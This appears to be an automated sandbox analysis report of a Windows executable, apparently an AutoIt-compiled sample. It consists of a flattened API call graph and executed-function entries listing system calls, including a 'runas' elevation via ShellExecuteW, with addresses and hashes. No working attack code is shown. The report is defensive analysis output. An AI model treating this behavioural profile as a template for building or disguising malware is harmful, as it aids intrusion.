API calls 96920->96921 96922 3a2acc 96921->96922 96923 3350f5 40 API calls 96922->96923 96924 3a2ae7 96923->96924 96925 3350f5 40 API calls 96924->96925 96926 3a2af7 96925->96926 96927 3350f5 40 API calls 96926->96927 96928 3a2b07 96927->96928 96929 3350f5 40 API calls 96928->96929 96930 3a2b17 96929->96930 96956 3a3017 GetTempPathW GetTempFileNameW 96930->96956 96932 3a2b22 96933 35e5eb 29 API calls 96932->96933 96944 3a2b33 96933->96944 96934 3a2bed 96935 35e678 67 API calls 96934->96935 96936 3a2bf8 96935->96936 96938 3a2bfe DeleteFileW 96936->96938 96939 3a2c12 96936->96939 96937 3350f5 40 API calls 96937->96944 96938->96914 96940 3a2c91 CopyFileW 96939->96940 96946 3a2c18 96939->96946 96941 3a2cb9 DeleteFileW 96940->96941 96942 3a2ca7 DeleteFileW 96940->96942 96957 3a2fd8 CreateFileW 96941->96957 96942->96914 96944->96914 96944->96934 96944->96937 96945 35dbb3 65 API calls 96944->96945 96945->96944 96947 3a22ce 79 API calls 96946->96947 96948 3a2c7c 96947->96948 96948->96941 96949 3a2c80 DeleteFileW 96948->96949 96949->96914 96950->96517 96951->96552 96952->96565 96953->96838 96954->96880 96955->96882 96956->96932 96960->96916 96961->96910 96962 383f75 96963 34ceb1 23 API calls 96962->96963 96964 383f8b 96963->96964 96965 384006 96964->96965 97031 34e300 23 API calls 96964->97031 96973 33bf40 96965->96973 96969 384052 96971 384a88 96969->96971 97033 3a359c 82 API calls __wsopen_s 96969->97033 96970 383fe6 96970->96969 97032 3a1abf 22 API calls 96970->97032 97034 33adf0 96973->97034 96975 33bf9d 96976 33bfa9 96975->96976 96977 3804b6 96975->96977 96979 3804c6 96976->96979 96980 33c01e 96976->96980 97053 3a359c 82 API calls __wsopen_s 96977->97053 97054 3a359c 82 API calls __wsopen_s 96979->97054 97039 33ac91 96980->97039 96984 33c7da 96988 34fe0b 22 API calls 96984->96988 96985 397120 22 API calls 97001 33c039 ISource __fread_nolock 96985->97001 96997 33c808 __fread_nolock 96988->96997 96990 3804f5 96993 38055a 96990->96993 97055 34d217 239 API calls 96990->97055 97014 33c603 96993->97014 97056 3a359c 82 API calls __wsopen_s 96993->97056 96994 33ec40 239 API calls 96994->97001 96995 34fe0b 22 API calls 97002 33c350 ISource __fread_nolock 96995->97002 96996 33af8a 22 API calls 96996->97001 96997->96995 96998 38091a 97066 3a3209 23 API calls 96998->97066 97001->96984 97001->96985 97001->96990 97001->96993 97001->96994 97001->96996 97001->96997 97001->96998 97003 3808a5 97001->97003 97004 33c237 97001->97004 97008 380591 97001->97008 97009 3808f6 97001->97009 97001->97014 97019 34fddb 22 API calls 97001->97019 97024 3809bf 97001->97024 97026 33bbe0 40 API calls 97001->97026 97029 34fe0b 22 API calls 97001->97029 97043 33ad81 97001->97043 97058 397099 22 API calls __fread_nolock 97001->97058 97059 3b5745 54 API calls _wcslen 97001->97059 97060 34aa42 22 API calls ISource 97001->97060 97061 39f05c 40 API calls 97001->97061 97062 33a993 41 API calls 97001->97062 97063 33aceb 23 API calls ISource 97001->97063 97030 33c3ac 97002->97030 97052 34ce17 22 API calls ISource 97002->97052 97005 33ec40 239 API calls 97003->97005 97016 33c253 97004->97016 97017 33a8c7 22 API calls 97004->97017 97007 3808cf 97005->97007 97007->97014 97064 33a81b 41 API calls 97007->97064 97057 3a359c 82 API calls __wsopen_s 97008->97057 97065 3a359c 82 API calls __wsopen_s 97009->97065 97014->96969 97018 380976 97016->97018 97022 33c297 ISource 97016->97022 97017->97016 97067 33aceb 23 API calls ISource 97018->97067 97019->97001 97022->97024 97050 33aceb 23 API calls ISource 97022->97050 97024->97014 97068 3a359c 82 API calls __wsopen_s 97024->97068 97025 33c335 97025->97024 97027 33c342 97025->97027 97026->97001 97051 33a704 22 API calls ISource 97027->97051 97029->97001 97030->96969 97031->96970 97032->96965 97033->96971 97035 33ae01 97034->97035 97038 33ae1c ISource 97034->97038 97036 33aec9 22 API calls 97035->97036 97037 33ae09 CharUpperBuffW 97036->97037 97037->97038 97038->96975 97040 33acae 97039->97040 97041 33acd1 97040->97041 97069 3a359c 82 API calls __wsopen_s 97040->97069 97041->97001 97044 33ad92 97043->97044 97045 37fadb 97043->97045 97046 34fddb 22 API calls 97044->97046 97047 33ad99 97046->97047 97070 33adcd 97047->97070 97050->97025 97051->97002 97052->97002 97053->96979 97054->97014 97055->96993 97056->97014 97057->97014 97058->97001 97059->97001 97060->97001 97061->97001 97062->97001 97063->97001 97064->97009 97065->97014 97066->97004 97067->97024 97068->97014 97069->97041 97073 33addd 97070->97073 97071 33adb6 97071->97001 97072 34fddb 22 API calls 97072->97073 97073->97071 97073->97072 97074 33a961 22 API calls 97073->97074 97075 33a8c7 22 API calls 97073->97075 97076 33adcd 22 API calls 97073->97076 97074->97073 97075->97073 97076->97073 97077 3503fb 97078 350407 ___DestructExceptionObject 97077->97078 97106 34feb1 97078->97106 97080 35040e 97081 350561 97080->97081 97085 350438 97080->97085 97133 35083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97081->97133 97083 350568 97134 354e52 28 API calls _abort 97083->97134 97092 350477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97085->97092 97117 36247d 97085->97117 97086 35056e 97135 354e04 28 API calls _abort 97086->97135 97090 350576 97091 350457 97094 3504d8 97092->97094 97129 354e1a 38 API calls 2 library calls 97092->97129 97125 350959 97094->97125 97097 3504de 97098 3504f3 97097->97098 97130 350992 GetModuleHandleW 97098->97130 97100 3504fa 97100->97083 97101 3504fe 97100->97101 97102 350507 97101->97102 97131 354df5 28 API calls _abort 97101->97131 97132 350040 13 API calls 2 library calls 97102->97132 97105 35050f 97105->97091 97107 34feba 97106->97107 97136 350698 IsProcessorFeaturePresent 97107->97136 97109 34fec6 97137 352c94 10 API calls 3 library calls 97109->97137 97111 34fecb 97112 34fecf 97111->97112 97138 362317 97111->97138 97112->97080 97115 34fee6 97115->97080 97120 362494 97117->97120 97118 350a8c _ValidateLocalCookies 5 API calls 97119 350451 97118->97119 97119->97091 97121 362421 97119->97121 97120->97118 97122 362450 97121->97122 97123 350a8c _ValidateLocalCookies 5 API calls 97122->97123 97124 362479 97123->97124 97124->97092 97189 352340 97125->97189 97128 35097f 97128->97097 97129->97094 97130->97100 97131->97102 97132->97105 97133->97083 97134->97086 97135->97090 97136->97109 97137->97111 97142 36d1f6 97138->97142 97141 352cbd 8 API calls 3 library calls 97141->97112 97145 36d213 97142->97145 97146 36d20f 97142->97146 97143 350a8c _ValidateLocalCookies 5 API calls 97144 34fed8 97143->97144 97144->97115 97144->97141 97145->97146 97148 364bfb 97145->97148 97146->97143 97149 364c07 ___DestructExceptionObject 97148->97149 97160 362f5e EnterCriticalSection 97149->97160 97151 364c0e 97161 3650af 97151->97161 97153 364c1d 97159 364c2c 97153->97159 97174 364a8f 29 API calls 97153->97174 97156 364c27 97175 364b45 GetStdHandle GetFileType 97156->97175 97157 364c3d __wsopen_s 97157->97145 97176 364c48 LeaveCriticalSection _abort 97159->97176 97160->97151 97162 3650bb ___DestructExceptionObject 97161->97162 97163 3650df 97162->97163 97164 3650c8 97162->97164 97177 362f5e EnterCriticalSection 97163->97177 97185 35f2d9 20 API calls _abort 97164->97185 97167 3650cd 97186 3627ec 26 API calls _abort 97167->97186 97169 3650d7 __wsopen_s 97169->97153 97170 365117 97187 36513e LeaveCriticalSection _abort 97170->97187 97173 3650eb 97173->97170 97178 365000 97173->97178 97174->97156 97175->97159 97176->97157 97177->97173 97179 364c7d _abort 20 API calls 97178->97179 97181 365012 97179->97181 97180 36501f 97182 3629c8 _free 20 API calls 97180->97182 97181->97180 97188 363405 11 API calls 2 library calls 97181->97188 97184 365071 97182->97184 97184->97173 97185->97167 97186->97169 97187->97169 97188->97181 97190 35096c GetStartupInfoW 97189->97190 97190->97128 97191 332de3 97192 332df0 __wsopen_s 97191->97192 97193 332e09 97192->97193 97194 372c2b ___scrt_fastfail 97192->97194 97195 333aa2 23 API calls 97193->97195 97197 372c47 GetOpenFileNameW 97194->97197 97196 332e12 97195->97196 97207 332da5 97196->97207 97198 372c96 97197->97198 97200 336b57 22 API calls 97198->97200 97202 372cab 97200->97202 97202->97202 97204 332e27 97225 3344a8 97204->97225 97208 371f50 __wsopen_s 97207->97208 97209 332db2 GetLongPathNameW 97208->97209 97210 336b57 22 API calls 97209->97210 97211 332dda 97210->97211 97212 333598 97211->97212 97213 33a961 22 API calls 97212->97213 97214 3335aa 97213->97214 97215 333aa2 23 API calls 97214->97215 97216 3335b5 97215->97216 97217 3335c0 97216->97217 97221 3732eb 97216->97221 97218 33515f 22 API calls 97217->97218 97220 3335cc 97218->97220 97254 3335f3 97220->97254 97222 37330d 97221->97222 97260 34ce60 41 API calls 97221->97260 97224 3335df 97224->97204 97226 334ecb 94 API calls 97225->97226 97227 3344cd 97226->97227 97228 373833 97227->97228 97229 334ecb 94 API calls 97227->97229 97230 3a2cf9 80 API calls 97228->97230 97231 3344e1 97229->97231 97232 373848 97230->97232 97231->97228 97233 3344e9 97231->97233 97234 37384c 97232->97234 97235 373869 97232->97235 97238 373854 97233->97238 97239 3344f5 97233->97239 97236 334f39 68 API calls 97234->97236 97237 34fe0b 22 API calls 97235->97237 97236->97238 97244 3738ae 97237->97244 97262 39da5a 82 API calls 97238->97262 97261 33940c 136 API calls 2 library calls 97239->97261 97242 373862 97242->97235 97243 332e31 97245 373a5f 97244->97245 97251 339cb3 22 API calls 97244->97251 97263 39967e 22 API calls __fread_nolock 97244->97263 97264 3995ad 42 API calls _wcslen 97244->97264 97265 3a0b5a 22 API calls 97244->97265 97266 33a4a1 22 API calls __fread_nolock 97244->97266 97267 333ff7 22 API calls 97244->97267 97246 334f39 68 API calls 97245->97246 97268 39989b 82 API calls __wsopen_s 97245->97268 97246->97245 97251->97244 97255 333605 97254->97255 97259 333624 __fread_nolock 97254->97259 97258 34fe0b 22 API calls 97255->97258 97256 34fddb 22 API calls 97257 33363b 97256->97257 97257->97224 97258->97259 97259->97256 97260->97221 97261->97243 97262->97242 97263->97244 97264->97244 97265->97244 97266->97244 97267->97244 97268->97245 97269 372ba5 97270 332b25 97269->97270 97271 372baf 97269->97271 97297 332b83 7 API calls 97270->97297 97273 333a5a 24 API calls 97271->97273 97275 372bb8 97273->97275 97277 339cb3 22 API calls 97275->97277 97279 372bc6 97277->97279 97278 332b2f 97282 333837 49 API calls 97278->97282 97287 332b44 97278->97287 97280 372bf5 97279->97280 97281 372bce 97279->97281 97283 3333c6 22 API calls 97280->97283 97284 3333c6 22 API calls 97281->97284 97282->97287 97295 372bf1 GetForegroundWindow ShellExecuteW 97283->97295 97285 372bd9 97284->97285 97286 336350 22 API calls 97285->97286 97289 372be7 97286->97289 97292 332b5f 97287->97292 97301 3330f2 Shell_NotifyIconW ___scrt_fastfail 97287->97301 97293 3333c6 22 API calls 97289->97293 97291 372c26 97291->97292 97294 332b66 SetCurrentDirectoryW 97292->97294 97293->97295 97296 332b7a 97294->97296 97295->97291 97302 332cd4 7 API calls 97297->97302 97299 332b2a 97300 332c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97299->97300 97300->97278 97301->97292 97302->97299 97303 368402 97308 3681be 97303->97308 97307 36842a 97313 3681ef try_get_first_available_module 97308->97313 97310 3683ee 97327 3627ec 26 API calls _abort 97310->97327 97312 368343 97312->97307 97320 370984 97312->97320 97316 368338 97313->97316 97323 358e0b 40 API calls 2 library calls 97313->97323 97315 36838c 97315->97316 97324 358e0b 40 API calls 2 library calls 97315->97324 97316->97312 97326 35f2d9 20 API calls _abort 97316->97326 97318 3683ab 97318->97316 97325 358e0b 40 API calls 2 library calls 97318->97325 97328 370081 97320->97328 97322 37099f 97322->97307 97323->97315 97324->97318 97325->97316 97326->97310 97327->97312 97329 37008d ___DestructExceptionObject 97328->97329 97330 37009b 97329->97330 97333 3700d4 97329->97333 97386 35f2d9 20 API calls _abort 97330->97386 97332 3700a0 97387 3627ec 26 API calls _abort 97332->97387 97339 37065b 97333->97339 97338 3700aa __wsopen_s 97338->97322 97389 37042f 97339->97389 97342 3706a6 97407 365221 97342->97407 97343 37068d 97421 35f2c6 20 API calls _abort 97343->97421 97346 3706ab 97347 3706b4 97346->97347 97348 3706cb 97346->97348 97423 35f2c6 20 API calls _abort 97347->97423 97420 37039a CreateFileW 97348->97420 97352 3706b9 97424 35f2d9 20 API calls _abort 97352->97424 97353 370704 97355 370781 GetFileType 97353->97355 97357 370756 GetLastError 97353->97357 97425 37039a CreateFileW 97353->97425 97356 37078c GetLastError 97355->97356 97362 3707d3 97355->97362 97427 35f2a3 20 API calls __dosmaperr 97356->97427 97426 35f2a3 20 API calls __dosmaperr 97357->97426 97360 370692 97422 35f2d9 20 API calls _abort 97360->97422 97361 37079a CloseHandle 97361->97360 97364 3707c3 97361->97364 97429 36516a 21 API calls 2 library calls 97362->97429 97428 35f2d9 20 API calls _abort 97364->97428 97366 370749 97366->97355 97366->97357 97368 3707f4 97369 370840 97368->97369 97430 3705ab 72 API calls 3 library calls 97368->97430 97374 37086d 97369->97374 97431 37014d 72 API calls 4 library calls 97369->97431 97370 3707c8 97370->97360 97373 370866 97373->97374 97375 37087e 97373->97375 97376 3686ae __wsopen_s 29 API calls 97374->97376 97377 3700f8 97375->97377 97378 3708fc CloseHandle 97375->97378 97376->97377 97388 370121 LeaveCriticalSection __wsopen_s 97377->97388 97432 37039a CreateFileW 97378->97432 97380 370927 97381 37095d 97380->97381 97382 370931 GetLastError 97380->97382 97381->97377 97433 35f2a3 20 API calls __dosmaperr 97382->97433 97384 37093d 97434 365333 21 API calls 2 library calls 97384->97434 97386->97332 97387->97338 97388->97338 97390 37046a 97389->97390 97391 370450 97389->97391 97435 3703bf 97390->97435 97391->97390 97442 35f2d9 20 API calls _abort 97391->97442 97394 37045f 97443 3627ec 26 API calls _abort 97394->97443 97396 3704d1 97405 370524 97396->97405 97446 35d70d 26 API calls 2 library calls 97396->97446 97397 3704a2 97397->97396 97444 35f2d9 20 API calls _abort 97397->97444 97400 37051f 97402 37059e 97400->97402 97400->97405 97401 3704c6 97445 3627ec 26 API calls _abort 97401->97445 97447 3627fc 11 API calls _abort 97402->97447 97405->97342 97405->97343 97406 3705aa 97408 36522d ___DestructExceptionObject 97407->97408 97450 362f5e EnterCriticalSection 97408->97450 97410 365234 97411 365259 97410->97411 97416 3652c7 EnterCriticalSection 97410->97416 97418 36527b 97410->97418 97413 365000 __wsopen_s 21 API calls 97411->97413 97415 36525e 97413->97415 97414 3652a4 __wsopen_s 97414->97346 97415->97418 97454 365147 EnterCriticalSection 97415->97454 97417 3652d4 LeaveCriticalSection 97416->97417 97416->97418 97417->97410 97451 36532a 97418->97451 97420->97353 97421->97360 97422->97377 97423->97352 97424->97360 97425->97366 97426->97360 97427->97361 97428->97370 97429->97368 97430->97369 97431->97373 97432->97380 97433->97384 97434->97381 97436 3703d7 97435->97436 97439 3703f2 97436->97439 97448 35f2d9 20 API calls _abort 97436->97448 97438 370416 97449 3627ec 26 API calls _abort 97438->97449 97439->97397 97441 370421 97441->97397 97442->97394 97443->97390 97444->97401 97445->97396 97446->97400 97447->97406 97448->97438 97449->97441 97450->97410 97455 362fa6 LeaveCriticalSection 97451->97455 97453 365331 97453->97414 97454->97418 97455->97453 97456 336a26 97457 34fddb 22 API calls 97456->97457 97458 336a33 97457->97458 97459 331044 97464 3310f3 97459->97464 97461 33104a 97500 3500a3 29 API calls __onexit 97461->97500 97463 331054 97501 331398 97464->97501 97468 33116a 97469 33a961 22 API calls 97468->97469 97470 331174 97469->97470 97471 33a961 22 API calls 97470->97471 97472 33117e 97471->97472 97473 33a961 22 API calls 97472->97473 97474 331188 97473->97474 97475 33a961 22 API calls 97474->97475 97476 3311c6 97475->97476 97477 33a961 22 API calls 97476->97477 97478 331292 97477->97478 97511 33171c 97478->97511 97482 3312c4 97483 33a961 22 API calls 97482->97483 97484 3312ce 97483->97484 97485 341940 9 API calls 97484->97485 97486 3312f9 97485->97486 97532 331aab 97486->97532 97488 331315 97489 331325 GetStdHandle 97488->97489 97490 372485 97489->97490 97491 33137a 97489->97491 97490->97491 97492 37248e 97490->97492 97494 331387 OleInitialize 97491->97494 97493 34fddb 22 API calls 97492->97493 97495 372495 97493->97495 97494->97461 97539 3a011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97495->97539 97497 37249e 97540 3a0944 CreateThread 97497->97540 97499 3724aa CloseHandle 97499->97491 97500->97463 97541 3313f1 97501->97541 97504 3313f1 22 API calls 97505 3313d0 97504->97505 97506 33a961 22 API calls 97505->97506 97507 3313dc 97506->97507 97508 336b57 22 API calls 97507->97508 97509 331129 97508->97509 97510 331bc3 6 API calls 97509->97510 97510->97468 97512 33a961 22 API calls 97511->97512 97513 33172c 97512->97513 97514 33a961 22 API calls 97513->97514 97515 331734 97514->97515 97516 33a961 22 API calls 97515->97516 97517 33174f 97516->97517 97518 34fddb 22 API calls 97517->97518 97519 33129c 97518->97519 97520 331b4a 97519->97520 97521 331b58 97520->97521 97522 33a961 22 API calls 97521->97522 97523 331b63 97522->97523 97524 33a961 22 API calls 97523->97524 97525 331b6e 97524->97525 97526 33a961 22 API calls 97525->97526 97527 331b79 97526->97527 97528 33a961 22 API calls 97527->97528 97529 331b84 97528->97529 97530 34fddb 22 API calls 97529->97530 97531 331b96 RegisterWindowMessageW 97530->97531 97531->97482 97533 331abb 97532->97533 97534 37272d 97532->97534 97535 34fddb 22 API calls 97533->97535 97548 3a3209 23 API calls 97534->97548 97537 331ac3 97535->97537 97537->97488 97538 372738 97539->97497 97540->97499 97549 3a092a 28 API calls 97540->97549 97542 33a961 22 API calls 97541->97542 97543 3313fc 97542->97543 97544 33a961 22 API calls 97543->97544 97545 331404 97544->97545 97546 33a961 22 API calls 97545->97546 97547 3313c6 97546->97547 97547->97504 97548->97538 97550 382a00 97564 33d7b0 ISource 97550->97564 97551 33db11 PeekMessageW 97551->97564 97552 33d807 GetInputState 97552->97551 97552->97564 97553 381cbe TranslateAcceleratorW 97553->97564 97555 33db73 TranslateMessage DispatchMessageW 97556 33db8f PeekMessageW 97555->97556 97556->97564 97557 33da04 timeGetTime 97557->97564 97558 33dbaf Sleep 97575 33dbc0 97558->97575 97559 382b74 Sleep 97559->97575 97560 381dda timeGetTime 97613 34e300 23 API calls 97560->97613 97561 34e551 timeGetTime 97561->97575 97564->97551 97564->97552 97564->97553 97564->97555 97564->97556 97564->97557 97564->97558 97564->97559 97564->97560 97566 33d9d5 97564->97566 97578 33ec40 239 API calls 97564->97578 97579 33bf40 239 API calls 97564->97579 97580 341310 239 API calls 97564->97580 97582 33dd50 97564->97582 97589 33dfd0 97564->97589 97612 34edf6 IsDialogMessageW GetClassLongW 97564->97612 97614 3a3a2a 23 API calls 97564->97614 97615 3a359c 82 API calls __wsopen_s 97564->97615 97565 382c0b GetExitCodeProcess 97569 382c21 WaitForSingleObject 97565->97569 97570 382c37 CloseHandle 97565->97570 97567 3c29bf GetForegroundWindow 97567->97575 97569->97564 97569->97570 97570->97575 97571 382a31 97571->97566 97572 382ca9 Sleep 97572->97564 97575->97561 97575->97564 97575->97565 97575->97566 97575->97567 97575->97571 97575->97572 97616 3b5658 23 API calls 97575->97616 97617 39e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97575->97617 97618 39d4dc 47 API calls 97575->97618 97578->97564 97579->97564 97580->97564 97583 33dd83 97582->97583 97584 33dd6f 97582->97584 97620 3a359c 82 API calls __wsopen_s 97583->97620 97619 33d260 239 API calls 2 library calls 97584->97619 97586 33dd7a 97586->97564 97588 382f75 97588->97588 97590 33e010 97589->97590 97609 33e0dc ISource 97590->97609 97623 350242 5 API calls __Init_thread_wait 97590->97623 97593 382fca 97595 33a961 22 API calls 97593->97595 97593->97609 97594 33a961 22 API calls 97594->97609 97597 382fe4 97595->97597 97624 3500a3 29 API calls __onexit 97597->97624 97601 382fee 97625 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97601->97625 97604 33a8c7 22 API calls 97604->97609 97605 3404f0 22 API calls 97605->97609 97606 33ec40 239 API calls 97606->97609 97607 33e3e1 97607->97564 97608 3a359c 82 API calls 97608->97609 97609->97594 97609->97604 97609->97605 97609->97606 97609->97607 97609->97608 97621 33a81b 41 API calls 97609->97621 97622 34a308 239 API calls 97609->97622 97626 350242 5 API calls __Init_thread_wait 97609->97626 97627 3500a3 29 API calls __onexit 97609->97627 97628 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97609->97628 97629 3b47d4 239 API calls 97609->97629 97630 3b68c1 239 API calls 97609->97630 97612->97564 97613->97564 97614->97564 97615->97564 97616->97575 97617->97575 97618->97575 97619->97586 97620->97588 97621->97609 97622->97609 97623->97593 97624->97601 97625->97609 97626->97609 97627->97609 97628->97609 97629->97609 97630->97609 97631 331cad SystemParametersInfoW

                        Executed Functions

                        Function 003342DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 234 3342de-33434d call 33a961 GetVersionExW call 336b57 239 373617-37362a 234->239 240 334353 234->240 242 37362b-37362f 239->242 241 334355-334357 240->241 243 373656 241->243 244 33435d-3343bc call 3393b2 call 3337a0 241->244 245 373632-37363e 242->245 246 373631 242->246 250 37365d-373660 243->250 263 3343c2-3343c4 244->263 264 3737df-3737e6 244->264 245->242 247 373640-373642 245->247 246->245 247->241 249 373648-37364f 247->249 249->239 252 373651 249->252 253 373666-3736a8 250->253 254 33441b-334435 GetCurrentProcess IsWow64Process 250->254 252->243 253->254 258 3736ae-3736b1 253->258 256 334437 254->256 257 334494-33449a 254->257 260 33443d-334449 256->260 257->260 261 3736b3-3736bd 258->261 262 3736db-3736e5 258->262 265 373824-373828 GetSystemInfo 260->265 266 33444f-33445e LoadLibraryA 260->266 267 3736bf-3736c5 261->267 268 3736ca-3736d6 261->268 270 3736e7-3736f3 262->270 271 3736f8-373702 262->271 263->250 269 3343ca-3343dd 263->269 272 373806-373809 264->272 273 3737e8 264->273 276 334460-33446e GetProcAddress 266->276 277 33449c-3344a6 GetSystemInfo 266->277 267->254 268->254 278 3343e3-3343e5 269->278 279 373726-37372f 269->279 270->254 281 373715-373721 271->281 282 373704-373710 271->282 274 3737f4-3737fc 272->274 275 37380b-37381a 272->275 280 3737ee 273->280 274->272 275->280 285 37381c-373822 275->285 276->277 286 334470-334474 GetNativeSystemInfo 276->286 287 334476-334478 277->287 288 3343eb-3343ee 278->288 289 37374d-373762 278->289 283 373731-373737 279->283 284 37373c-373748 279->284 280->274 281->254 282->254 283->254 284->254 285->274 286->287 292 334481-334493 287->292 293 33447a-33447b FreeLibrary 287->293 294 373791-373794 288->294 295 3343f4-33440f 288->295 290 373764-37376a 289->290 291 37376f-37377b 289->291 290->254 291->254 293->292 294->254 298 37379a-3737c1 294->298 296 334415 295->296 297 373780-37378c 295->297 296->254 297->254 299 3737c3-3737c9 298->299 300 3737ce-3737da 298->300 299->254 300->254
                        APIs
                        • GetVersionExW.KERNEL32(?), ref: 0033430D
                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                        • GetCurrentProcess.KERNEL32(?,003CCB64,00000000,?,?), ref: 00334422
                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 00334429
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00334454
                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00334466
                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00334474
                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0033447B
                        • GetSystemInfo.KERNEL32(?,?,?), ref: 003344A0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                        • API String ID: 3290436268-3101561225
                        • Opcode ID: 4d0d03470150862beeac6b7e1cf87356d5eab0abcfba59b1b0ab6dd7f884f421
                        • Instruction ID: 6330e2413d45885af5e8023fbe68d421b5665a6b92e2d8e15fde8dc79b87d354
                        • Opcode Fuzzy Hash: 4d0d03470150862beeac6b7e1cf87356d5eab0abcfba59b1b0ab6dd7f884f421
                        • Instruction Fuzzy Hash: 5FA1B87192A2C0DFE727C76A7EC15957FE87B26300F0894B9E885F3A32D2345914DB29
                        Function 003342A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1378 3342a2-3342ba CreateStreamOnHGlobal 1379 3342da-3342dd 1378->1379 1380 3342bc-3342d3 FindResourceExW 1378->1380 1381 3342d9 1380->1381 1382 3735ba-3735c9 LoadResource 1380->1382 1381->1379 1382->1381 1383 3735cf-3735dd SizeofResource 1382->1383 1383->1381 1384 3735e3-3735ee LockResource 1383->1384 1384->1381 1385 3735f4-373612 1384->1385 1385->1381
                        APIs
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003350AA,?,?,00000000,00000000), ref: 003342B2
                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003350AA,?,?,00000000,00000000), ref: 003342C9
                        • LoadResource.KERNEL32(?,00000000,?,?,003350AA,?,?,00000000,00000000,?,?,?,?,?,?,00334F20), ref: 003735BE
                        • SizeofResource.KERNEL32(?,00000000,?,?,003350AA,?,?,00000000,00000000,?,?,?,?,?,?,00334F20), ref: 003735D3
                        • LockResource.KERNEL32(003350AA,?,?,003350AA,?,?,00000000,00000000,?,?,?,?,?,?,00334F20,?), ref: 003735E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                        • String ID: SCRIPT
                        • API String ID: 3051347437-3967369404
                        • Opcode ID: 66416d8bd0581f03bdee432686227283083aff62fb32698c9a84c54625863c25
                        • Instruction ID: 3ef04f97af142eeb93259d9b2add555444f35f51f00ca5425217e8decba28034
                        • Opcode Fuzzy Hash: 66416d8bd0581f03bdee432686227283083aff62fb32698c9a84c54625863c25
                        • Instruction Fuzzy Hash: FF115A70200700AFDB228BA6DC88F677BBDEBC6B51F158969F416D6650DB71EC008B20
                        Function 00372BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00332B6B
                          • Part of subcall function 00333A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00401418,?,00332E7F,?,?,?,00000000), ref: 00333A78
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • GetForegroundWindow.USER32(runas,?,?,?,?,?,003F2224), ref: 00372C10
                        • ShellExecuteW.SHELL32(00000000,?,?,003F2224), ref: 00372C17
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                        • String ID: runas
                        • API String ID: 448630720-4000483414
                        • Opcode ID: 306ce0a178b8bfad8bbdc37a215a00fd35a7f666442059b4ec7009bb8e7bdd6e
